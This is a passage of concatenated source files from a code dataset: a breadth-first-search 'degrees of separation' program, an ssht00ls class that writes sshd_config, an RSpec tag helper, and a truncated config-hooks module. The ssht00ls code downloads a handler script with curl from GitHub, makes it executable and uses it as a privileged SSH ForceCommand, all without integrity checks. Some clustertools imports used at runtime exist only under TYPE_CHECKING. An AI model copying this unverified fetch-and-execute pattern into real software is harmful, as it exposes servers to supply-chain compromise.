reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef check_if_goal(node, target):\n \"\"\"\n Checks if current node is the target node\n if so returns a Path of actions to that node\n if not returns None\n \"\"\"\n\n # If this is the target we seek\n # Add the path to target to solutions list\n if node.state == target:\n path = []\n targetNode = node\n while targetNode.parent is not None:\n path.append(targetNode.action)\n targetNode = targetNode.parent\n path.reverse()\n return path\n return None\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n # Set source as root node\n start = Node(state=source, parent=None, action=None)\n\n # Initialize frontier with a Queue.\n # We use breadth-first search and hence a queue to ensure\n # that we find the most optimal (shortest) solution\n\n frontier = QueueFrontier()\n\n # Set of visited nodes\n explored_people = set()\n\n # Check if start is target\n goal = check_if_goal(start, target)\n\n # If start is target, end search\n if goal is not None:\n return goal\n\n # Add root node to frontier\n frontier.add(start)\n\n # Repeat until frontier is empty\n while True:\n if frontier.empty():\n break\n # Get 
the first node in the queue\n node = frontier.remove()\n\n # Mark the current node as explored by adding it to explored set\n explored_people.add(node.state)\n\n # Add node's neighbors to frontier\n for movie, person in neighbors_for_person(node.state):\n if not frontier.contains_state(\n person) and person not in explored_people:\n child = Node(state=person, parent=node, action=(movie, person))\n path = check_if_goal(child, target)\n if path is not None:\n return path\n else:\n frontier.add(child)\n return None\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week 0/projects/degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
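The degrees.py record above depends on a `util` module (Node, StackFrontier, QueueFrontier) that is not included in this dump. A minimal sketch of compatible stand-ins, inferred from how the record uses them (assumed shapes, not the original module), makes the BFS in `shortest_path` runnable on its own:

```python
from collections import deque

# Hypothetical stand-ins for the util module imported by degrees.py;
# only the attributes and methods the record actually calls are provided.
class Node:
    def __init__(self, state, parent, action):
        self.state = state    # person_id at this node
        self.parent = parent  # Node that was expanded to reach this one
        self.action = action  # (movie_id, person_id) edge taken

class QueueFrontier:
    def __init__(self):
        self.frontier = deque()

    def add(self, node):
        self.frontier.append(node)

    def contains_state(self, state):
        return any(node.state == state for node in self.frontier)

    def empty(self):
        return len(self.frontier) == 0

    def remove(self):
        if self.empty():
            raise Exception("empty frontier")
        return self.frontier.popleft()  # FIFO: expand the oldest node first
```

Removing nodes FIFO is what makes the search breadth-first, and therefore shortest-path-optimal on this unweighted graph; popping from the end instead would give depth-first search with no optimality guarantee.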
+{"seq_id":"503539090","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# imports.\nfrom ssht00ls.classes.config import *\nfrom ssht00ls.classes import utils\nfrom ssht00ls.classes.smartcards import smartcards\nfrom ssht00ls.classes.installation import installation\n\n# the sshd object class.\nclass SSHD(object):\n\tdef __init__(self):\n\t\t\n\t\t# check downloads.\n\t\tif CHECKS:\n\t\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\t\tfor subpath, url in [\n\t\t\t\t[\"handler\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/handler\"],\n\t\t\t]:\n\t\t\t\tfull_path = gfp.clean(f\"{utils_lib}/{subpath}\")\n\t\t\t\tos.system(f\"rm -fr {full_path}\")\n\t\t\t\tos.system(f\"curl -s {url} -o {full_path} && chmod +x {full_path}\")\n\t\t\t\tif not os.path.exists(full_path):\n\t\t\t\t\traise exceptions.ModuleError(\"Failed to install the ssht00ls utils (#1).\")\n\n\tdef create(self,\n\t\t# save the configuration & banner.\n\t\tsave=False,\n\t\t# the ssh port.\n\t\tport=22,\n\t\t# the listen addresses.\n\t\tlisten_addresses=[],\n\t\t# the server's banner.\n\t\tbanner=\"Hello World!\",\n\t\t# the allowed users & options.\n\t\tusers={\n\t\t\t# define per user (all keys are optional).\n\t\t\t\"administrator\": {\n\t\t\t\t# the user's root permissions.\n\t\t\t\t\"root_permissions\":False,\n\t\t\t\t# authentication by password.\n\t\t\t\t\"password_authentication\":False,\n\t\t\t\t# authentication by keys.\n\t\t\t\t\"key_authentication\":True,\n\t\t\t\t# ip filter.\n\t\t\t\t\"ip_filter\":False,\n\t\t\t\t\"allowed_ips\":[],\n\t\t\t\t# sftp server only.\n\t\t\t\t\"sftp_only\":False,\n\t\t\t\t# the chroot directory (leave null to disable).\n\t\t\t\t\"chroot_directory\":None,\n\t\t\t\t# allowed connection options.\n\t\t\t\t\"x11_forwarding\":False,\n\t\t\t\t\"tcp_forwarding\":False,\n\t\t\t\t\"permit_tunnel\":False,\n\t\t\t\t\"allow_stream_local_forwarding\":False,\n\t\t\t\t\"gateway_ports\":False,\n\t\t\t},\n\t\t},\n\t):\n\n\t\t# check users.\n\t\tresponse = self.__check_user_items__(users)\n\t\tif response[\"error\"] != None: return response\n\n\t\t# check utils installed (must be before __install_banner__).\n\t\tresponse = self.__check_utils_installed__(list(users.keys()))\n\t\tif response[\"error\"] != None: return response\n\n\t\t# install banner.\n\t\tif save:\n\t\t\tresponse = self.__install_banner__(banner=banner, usernames=list(users.keys()))\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# defaults.\n\t\tconfiguration = '# SSHD_CONFIG:'\n\t\tconfiguration += '\\n# BY VANDENBERGHINC'\n\t\tconfiguration += '\\n# MODULE: ssht00ls'\n\t\tconfiguration += '\\n# AUTHOR: DAAN VAN DEN BERGH'\n\t\tconfiguration += '\\nAcceptEnv LANG LC_*'\n\t\tconfiguration += '\\nSubsystem sftp internal-sftp'\n\t\t#configuration += '\\nSubsystem sftp /usr/libexec/sftp-server'\n\t\tconfiguration += '\\nLoginGraceTime 60'\n\t\tconfiguration += '\\nMaxAuthTries 3'\n\t\tconfiguration += '\\nMaxSessions 10'\n\t\tconfiguration += \"\\nMaxStartups 999\"\n\t\tconfiguration += '\\nLogLevel VERBOSE'\n\t\tconfiguration += f'\\nPort {port}'\n\t\tconfiguration += '\\nProtocol 2'\n\n\t\t# defaults.\n\t\tconfiguration += '\\nPermitRootLogin {}'.format(\"no\")\n\t\tconfiguration += '\\nStrictModes {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitUserEnvironment {}'.format(\"no\")\n\t\tconfiguration += '\\nIgnoreRhosts {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitTunnel {}'.format(\"no\")\n\t\tconfiguration += '\\nX11Forwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowTcpForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowStreamLocalForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nGatewayPorts {}'.format(\"no\")\n\t\tconfiguration += '\\nPermitTTY {}'.format(\"yes\")\n\t\tfor listen_address in listen_addresses:\n\t\t\tconfiguration += f'\\nListenAddress {listen_address}'\n\n\t\t# auth keys.\n\t\tconfiguration += '\\nAuthorizedKeysFile {}'.format(\".ssh/authorized_keys\")\n\n\t\t# banner.\n\t\tconfiguration += '\\nBanner .ssh/banner'\n\n\t\t# per users.\n\t\tconfiguration += '\\nChallengeResponseAuthentication no'\n\t\tfor username, info in users.items():\n\t\t\tconfiguration += f'\\n# User: {username}'\n\n\t\t\t# per-user match block.\n\t\t\tconfiguration += f'\\nMatch User {username}'\n\n\t\t\t# authentication by password.\n\t\t\tif info[\"password_authentication\"]:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication yes'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\n\t\t\t# authentication by keys.\n\t\t\tif info[\"key_authentication\"]:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('yes')\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('no')\n\n\n\t\t\t# chroot directory.\n\t\t\tif isinstance(info[\"chroot_directory\"], str):\n\t\t\t\tconfiguration += f'\\n ChrootDirectory {info[\"chroot_directory\"]}'\n\n\t\t\t# root permission.\n\t\t\tl = \"no\"\n\t\t\tif info[\"root_permissions\"] and info[\"key_authentication\"]: l = \"prohibit-password\"\n\t\t\telif info[\"root_permissions\"]: l = \"yes\"\n\t\t\tconfiguration += f'\\n PermitRootLogin {l}'\n\n\t\t\t# connection options.\n\t\t\tconfiguration += f'\\n X11Forwarding {self.__convert_boolean__(info[\"x11_forwarding\"])}'\n\t\t\tconfiguration += f'\\n AllowTcpForwarding {self.__convert_boolean__(info[\"tcp_forwarding\"])}'\n\n\t\t\t# default options.\n\t\t\tconfiguration += f'\\n PermitTunnel {self.__convert_boolean__(info[\"permit_tunnel\"])}'\n\t\t\tconfiguration += f'\\n AllowStreamLocalForwarding {self.__convert_boolean__(info[\"allow_stream_local_forwarding\"])}'\n\t\t\tconfiguration += f'\\n GatewayPorts {self.__convert_boolean__(info[\"gateway_ports\"])}'\n\t\t\tconfiguration += '\\n PermitTTY yes'\n\t\t\t\n\t\t\t# check ip filter.\n\t\t\tif info[\"ip_filter\"]:\n\n\t\t\t\t# match verified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address {self.__sum_list__(info[\"allowed_ips\"])}'\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t\t\t# match unverified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address *,!{self.__sum_list__(info[\"allowed_ips\"])}'\n\t\t\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"Your ip address is not authorized.\" \"Authorize your ip address to access user [{username}].\"'\n\n\t\t\t# no ip filter.\n\t\t\telse:\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t# match non-authorized users.\n\t\t#if '*all*' not in list(users.keys()):\n\t\tconfiguration += f'\\nMatch User *,!{self.__sum_list__(list(users.keys()))}'\n\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\tconfiguration += '\\n PubkeyAuthentication no'\n\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"You are not authorized to access user [$USER] over ssh.\"'\n\t\tconfiguration += \"\\n\"\n\n\t\t# save sshd.\n\t\tif save:\n\t\t\tfile = File(path='/tmp/sshd_config', data=configuration)\n\t\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\t\tfile.save()\n\t\t\tfp = FilePath(f\"/etc/ssh/sshd_config\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=644, sudo=True)\n\t\t\tfp.ownership.set(owner=\"root\", group=None, sudo=True)\n\t\t\tos.system(\"sudo systemctl restart ssh\")\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to save the sshd configuration.\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully created the sshd configuration.\", {\n\t\t\t\t\"sshd\":configuration,\n\t\t\t})\n\n\t\t#\n\t# system functions.\n\tdef __sum_list__(self, list):\n\t\treturn Array(path=False, array=list).string(joiner=',')\n\tdef __convert_boolean__(self, boolean):\n\t\tif boolean: return \"yes\"\n\t\telse: return \"no\"\n\tdef __check_user_items__(self, users):\n\n\t\t# iterate.\n\t\tfor username, info in users.items():\n\t\t\t\n\t\t\t# check options.\n\t\t\ttry: info[\"root_permissions\"]\n\t\t\texcept KeyError: info[\"root_permissions\"] = True\n\t\t\ttry: info[\"password_authentication\"]\n\t\t\texcept KeyError: info[\"password_authentication\"] = False\n\t\t\ttry: info[\"key_authentication\"]\n\t\t\texcept KeyError: info[\"key_authentication\"] = True\n\t\t\ttry: info[\"ip_filter\"]\n\t\t\texcept KeyError: info[\"ip_filter\"] = False\n\t\t\ttry: \n\t\t\t\tinfo[\"allowed_ips\"]\n\t\t\t\tif not isinstance(info[\"allowed_ips\"], list):\n\t\t\t\t\treturn r3sponse.error(f\"Invalid usage, parameter [users.{username}.allowed_ips] is supposed to be a list with allowed ip addresses.\")\n\t\t\texcept KeyError: info[\"allowed_ips\"] = []\n\t\t\ttry: info[\"sftp_only\"]\n\t\t\texcept KeyError: info[\"sftp_only\"] = False\n\t\t\ttry: info[\"chroot_directory\"]\n\t\t\texcept KeyError: info[\"chroot_directory\"] = None\n\t\t\ttry: info[\"x11_forwarding\"]\n\t\t\texcept KeyError: info[\"x11_forwarding\"] = False\n\t\t\ttry: info[\"tcp_forwarding\"]\n\t\t\texcept KeyError: info[\"tcp_forwarding\"] = False\n\t\t\t# also default the remaining options read by create().\n\t\t\ttry: info[\"permit_tunnel\"]\n\t\t\texcept KeyError: info[\"permit_tunnel\"] = False\n\t\t\ttry: info[\"allow_stream_local_forwarding\"]\n\t\t\texcept KeyError: info[\"allow_stream_local_forwarding\"] = False\n\t\t\ttry: info[\"gateway_ports\"]\n\t\t\texcept KeyError: info[\"gateway_ports\"] = False\n\n\t\t# response.\n\t\treturn r3sponse.success(\"Successfully checked the user items.\")\n\n\t\t#\n\tdef __check_utils_installed__(self, usernames=[]):\n\n\t\t# iterate.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tto_install = []\n\t\tfor username in usernames:\n\t\t\t\n\t\t\t# non-existent.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/.version.py\")\n\t\t\tif not fp.exists(sudo=True): \n\t\t\t\tto_install.append(username)\n\n\t\t\t# check version.\n\t\t\telse: \n\t\t\t\tversion = utils.__execute__([\"sudo\", \"cat\", fp.path])\n\t\t\t\tgithub_version = utils.__execute__([\"curl\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/.version.py?raw=true\"])\n\t\t\t\tif str(version) != str(github_version):\n\t\t\t\t\tto_install.append(username)\n\n\t\t# install.\n\t\tif len(to_install) > 0:\n\t\t\tresponse = self.__install_utils__(to_install)\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully verified the ssht00ls utils installation.\")\n\n\t\t#\n\tdef __install_utils__(self, usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# create tmp lib.\n\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\tutils_tmp = \"/tmp/utils/\"\n\t\tif not os.path.exists(utils_lib):\n\t\t\traise ValueError(f\"ssht00ls library [{utils_lib}] does not exist.\")\n\t\tos.system(f\"rsync -az {utils_lib} {utils_tmp} --delete\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__pycache__\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__init__.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/isdir.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/size.py\")\n\t\tif not Files.exists(utils_tmp):\n\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#2).\")\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\n\t\t\t# check if ssh is correctly installed.\n\t\t\tresponse = installation.check_installed(username=username)\n\n\t\t\t# install the ssh correctly for the specified user.\n\t\t\tif response[\"error\"] != None:\n\t\t\t\tresponse = installation.install(username=username)\n\t\t\t\tif response[\"error\"] != None: return response\n\n\t\t\t# copy.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/\")\n\t\t\tos.system(f\"sudo rm -fr {fp.path}\")\n\t\t\tos.system(f\"sudo rsync -az {utils_tmp} {fp.path} --delete\")\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True, recursive=True)\n\t\t\tfp.permission.set(permission=755, recursive=True, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#3).\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the ssht00ls utils.\")\n\n\t\t#\n\tdef __install_banner__(self, banner=\"\", usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# save banner.\n\t\tfile = File(path='/tmp/banner', data=banner)\n\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\tfile.save()\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/banner\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=755, sudo=True)\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to install the banner for user [{username}].\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the banner.\")\n\n\t\t#\n\t#\n\n# Initialized classes.\nsshd = SSHD()\n\n\n\n\n\n\n","sub_path":"ssht00ls/.legacy/3.14.0/classes/sshd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
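Traced by hand from `create` above, the per-user block it emits for the default `administrator` example (key-only login, no IP filter, shell access) looks roughly like this; illustrative output, not captured from an actual run:

```
# User: administrator
Match User administrator
 PasswordAuthentication no
 PermitEmptyPasswords no
 PubkeyAuthentication yes
 PermitRootLogin no
 X11Forwarding no
 AllowTcpForwarding no
 PermitTunnel no
 AllowStreamLocalForwarding no
 GatewayPorts no
 PermitTTY yes
 ForceCommand bash .ssh/utils/handler
```

Everything after `Match User administrator` applies only to that account, which is why the method closes with the catch-all `Match User *,!...` block that locks out every account not listed in `users`.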
+{"seq_id":"401023112","text":"from vt_manager.communication.sfa.rspecs.elements.element import Element \nfrom vt_manager.communication.sfa.rspecs.elements.pltag import PLTag\n\nclass SFAv1PLTag:\n    @staticmethod\n    def add_pl_tag(xml, name, value):\n        # add a single tag element to the xml node and set its text value\n        pl_tag_elem = xml.add_element(name)\n        pl_tag_elem.set_text(value)\n\n    @staticmethod\n    def get_pl_tags(xml, ignore=[]):\n        pl_tags = []\n        for elem in xml.iterchildren():\n            if elem.tag not in ignore:\n                pl_tag = PLTag({'tagname': elem.tag, 'value': elem.text})\n                pl_tags.append(pl_tag)\n        return pl_tags\n\n","sub_path":"vt_manager/src/python/vt_manager/communication/sfa/rspecs/elements/versions/sfav1PLTag.py","file_name":"sfav1PLTag.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"616238270","text":"from __future__ import annotations\n\nimport re\nimport time\nfrom collections import defaultdict\nfrom functools import wraps\nfrom typing import Any, Callable, Dict, Literal, TYPE_CHECKING, TypeVar, Union, Type\n\nif TYPE_CHECKING:\n from clustertools.file_objects.configs.global_config import GlobalConfig\n from clustertools.file_objects.configs.project_config import ProjectConfig\n from clustertools.shared.environ import PseudoEnviron\n from clustertools.shared.object_monitors import MonitoredEnviron, MonitoredList\n from clustertools.shared.typing import (_BoundHook,\n _CheckedVal,\n _Config,\n _Hook,\n _UncheckedVal,\n EmailAddress,\n OneOrMore,\n WallTimeStr)\n\n\nEMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$')\n\n\n########################################################################\n# CONFIG HOOK HELPERS #\n########################################################################\n# _T = TypeVar('_T')\n# class SimpleDefaultDict(dict):\n# # ADD DOCSTRING\n# \"\"\"\n# Similar to collections.defaultdict, but doesn't add missing keys.\n# Accepts an additional keyword-only argument 'default' that may\n# be either a default value to return for missing keys, or a\n# callable that accepts the missing key as an argument.\n#\n# Used here to provide a dummy callable hook for config fields that\n# don't require any special validation or extra work\n# \"\"\"\n# def __init__(\n# self,\n# *arg,\n# default: Union[_T, Callable[..., _T]] = None,\n# **kwargs\n# ) -> None:\n# # ADD DOCSTRING\n# if len(arg) > 1:\n# raise TypeError(\n# f\"{self.__class__.__name__} expected at most 1 argument, got \"\n# f\"{len(arg)}\"\n# )\n# super().__init__(*arg, **kwargs)\n# if callable(default):\n# self.default = default\n# else:\n# self.default = lambda key: default\n#\n# def __missing__(self, key: Any) -> _T:\n# return self.default(key)\n#\n#\n# def dummy_hook(inst: _Config, val: _T) -> _T:\n# return val\n\n\nclass ParrotDict(dict):\n def __missing__(self, key):\n return key\n\n\ndef bindable(\n func: _Hook[[_Config, _UncheckedVal], _CheckedVal]\n) -> _BoundHook[[_UncheckedVal], _CheckedVal]:\n # ADD DOCSTRING - decorates a function 'func', allowing it to be\n # bound to an object 'instance' at runtime and optionally added as\n # an instance method\n @wraps(func)\n def bind(instance: _Config) -> _BoundHook:\n return func.__get__(instance)\n\n return bind\n\n\n# def enforce_value_type(value: Any, _type: OneOrMore[Type]) -> None:\n# if not isinstance(value, _type):\n# if hasattr(_type, '__iter__'):\n# assert len(_type) == 2 # no fields should accept more than 2 types\n# t = f\"either '{_type[0].__name__}' or '{_type[1].__name__}'\"\n# else:\n# t = f\"'{_type.__name__}'\"\n# raise TypeError(\n# f\"Type of assigned value must be {t}. 
Received \"\n# f\"'{value.__class__.__name__}'\"\n# )\n\n\n########################################################################\n# TYPE CONVERTERS #\n########################################################################\n # Python types -> str #\ndef environ_to_str(environ: Union[Dict[str, str], PseudoEnviron]) -> str:\n str_fmt = '\\n'.join('='.join(item) for item in environ.items())\n if str_fmt != '':\n str_fmt = '\\n' + str_fmt\n return str_fmt\n\n\nto_str_funcs = {\n bool: lambda b: str(b).lower(),\n MonitoredList: lambda l: ','.join(l),\n MonitoredEnviron: environ_to_str\n}\nto_str_funcs = defaultdict(lambda: str, to_str_funcs)\n\n\ndef type_to_str(value: Any) -> str:\n return to_str_funcs[type(value)](value)\n\n\n # str -> Python types #\n@bindable\ndef str_to_environ(inst: _Config, environ_str: str) -> MonitoredEnviron:\n keys_vals = map(lambda x: x.split('='), environ_str.strip().splitlines())\n env_dict = {k.strip(): v.strip() for k, v in keys_vals}\n validate_item_hook = inst._object_validate_hooks['environ']\n post_update_hook = inst._object_post_update_hooks['environ']\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=env_dict,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_modules(inst: _Config, modules_str: str) -> MonitoredList:\n modules_list = [m.strip() for m in modules_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['modules']\n post_update_hook = inst._object_post_update_hooks['modules']\n return MonitoredList(modules_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_email_list(inst: _Config, email_str: str) -> MonitoredList:\n email_list = [m.strip() for m in email_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['email']\n post_update_hook = inst._object_post_update_hooks['email']\n return MonitoredList(email_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\nto_type_funcs = {\n 'environ': str_to_environ,\n 'modules': str_to_modules,\n 'email': str_to_email_list\n}\n\n@bindable\ndef str_to_type(\n inst: _Config,\n key: str,\n value: str\n) -> Union[str, bool, int, MonitoredEnviron[str, str], MonitoredList[str]]:\n if value == 'true':\n return True\n elif value == 'false':\n return False\n elif value.isdigit():\n return int(value)\n else:\n try:\n # call the bound converter registered for this key\n return inst._to_type_funcs[key](value)\n except KeyError:\n # then it must be a str\n return value\n\n\n########################################################################\n# MONITORED OBJECT HOOKS #\n########################################################################\n # validate_item_hooks #\ndef validate_email(email: str) -> None:\n # used by itself when individual items added to/replaced in\n # email_list and as part of 'validate_email_list' when entire field\n # is replaced\n\n is_valid = bool(email == 'INFER' or EMAIL_PATTERN.match(email))\n if not is_valid:\n raise ValueError(\n f\"{email} does not appear to be formatted as a valid email \"\n f\"address (you can pass 'infer' to use the default email address \"\n f\"for your account)\"\n )\n\n\nBASE_OBJECT_VALIDATE_HOOKS = {'email': validate_email}\n\n\n # post_update_hooks #\n@bindable\ndef environ_post_update_global(inst: GlobalConfig) -> None:\n default_environ = inst._config.project_defaults.runtime_environment.environ\n environ_str = environ_to_str(default_environ)\n inst._configparser.set('project_defaults.runtime_environment',\n 'environ',\n environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef environ_post_update_project(inst: ProjectConfig) -> None:\n environ_str = environ_to_str(inst._config.runtime_environment.environ)\n inst._configparser.set('runtime_environment', 'environ', environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_global(inst: GlobalConfig) -> None:\n modules_str = ','.join(inst._config.project_defaults.runtime_environment.modules)\n inst._configparser.set('project_defaults.runtime_environment',\n 'modules',\n modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_project(inst: ProjectConfig) -> None:\n modules_str = ','.join(inst._config.runtime_environment.modules)\n inst._configparser.set('runtime_environment', 'modules', modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_global(inst: GlobalConfig) -> None:\n emails_str = ','.join(inst._config.project_defaults.notifications.email)\n inst._configparser.set('project_defaults.notifications',\n 'email',\n emails_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_project(inst: ProjectConfig) -> None:\n emails_str = ','.join(inst._config.notifications.email)\n inst._configparser.set('notifications', 'email', emails_str)\n inst.write_config_file()\n\n\nGLOBAL_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_global,\n 'modules': modules_post_update_global,\n 'email': email_post_update_global\n}\n\n\nPROJECT_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_project,\n 'modules': modules_post_update_project,\n 'email': email_post_update_project\n}\n\n\n########################################################################\n# SHARED HOOKS (BaseConfig) #\n########################################################################\n@bindable\ndef validate_job_basename(inst: _Config, new_basename: str) -> str:\n # TODO: should logic for preventing changes to attribute when\n # submission/jobs in progress be handled here or on Project object?\n if len(new_basename) > 15:\n raise ValueError(\"Job names may be up to 15 characters in length\")\n elif not new_basename[0].isalpha():\n raise ValueError(\n \"Job names must start with an alphabetic character ([a-zA-Z])\"\n )\n elif re.search(r'\\s', new_basename) is not None:\n raise ValueError(\"Job names may not contain whitespace\")\n return new_basename\n\n\n@bindable\ndef validate_walltime_str(inst: _Config, walltime_str: str) -> WallTimeStr:\n try:\n time.strptime(walltime_str, '%H:%M:%S')\n except ValueError:\n try:\n time.strptime(walltime_str, '%M:%S')\n except ValueError:\n raise ValueError(\n \"Malformed string value for 'wall_time'. Format should be \"\n \"'HH:MM:SS', or 'MM:SS' if requesting < 1 hour\"\n )\n return walltime_str\n\n\n@bindable\ndef monitor_modules(\n inst: _Config,\n new_modules: OneOrMore[str]\n) -> MonitoredList:\n # called when config field is *replaced*, rather than edited\n if isinstance(new_modules, str):\n new_modules = [new_modules]\n else:\n new_modules = list(new_modules)\n if isinstance(inst, GlobalConfig):\n post_update_hook = modules_post_update_global\n else:\n post_update_hook = modules_post_update_project\n return MonitoredList(new_modules,\n 